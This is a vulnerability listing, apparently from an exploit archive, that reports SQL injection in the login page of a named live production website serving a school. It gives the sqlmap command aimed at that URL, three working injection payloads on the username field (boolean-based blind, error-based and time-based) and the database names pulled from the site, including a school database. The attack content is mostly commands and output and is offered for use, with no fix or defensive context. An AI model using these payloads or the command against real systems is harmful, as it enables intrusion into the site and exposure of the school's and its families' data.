Athens School / Atenas Familia / Atenas Tech / Bitnami LAMP | SQL Injection Vulnerability

2021.09.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Athens School / Atenas Familia / Atenas Tech / Bitnami LAMP | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "http://prod.atenas.tech/familia/login.php" --form --dbs --batch --------------------------------------------------------------------------------------------------- .tech is the internet's new generic top-level domain for IT professionals, web developers, software engineers, project managers, and UX designers. Athens School Atenas Familia Atenas Tech Bitnami LAMP http://prod.atenas.tech/familia/login.php --- Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=ykfU' RLIKE (SELECT (CASE WHEN (4900=4900) THEN 0x796b6655 ELSE 0x28 END)) AND 'taTA'='taTA&password=&saveidentity=on Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: username=ykfU' AND GTID_SUBSET(CONCAT(0x716b6b7a71,(SELECT (ELT(3198=3198,1))),0x716a7a6b71),3198) AND 'AbeW'='AbeW&password=&saveidentity=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=ykfU' AND (SELECT 9806 FROM (SELECT(SLEEP(5)))jyyH) AND 'sqlu'='sqlu&password=&saveidentity=on --- the back-end DBMS is MySQL web application technology: Apache 2.4.46, PHP 7.4.14 the back-end DBMS: MySQL >= 5.6 banner: '8.0.18-google' available databases [7]: [+] atenas_colegio [+] demo [+] information_schema [+] mysql [+] performance_schema [+] stage [+] sys

References:

0x01369


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top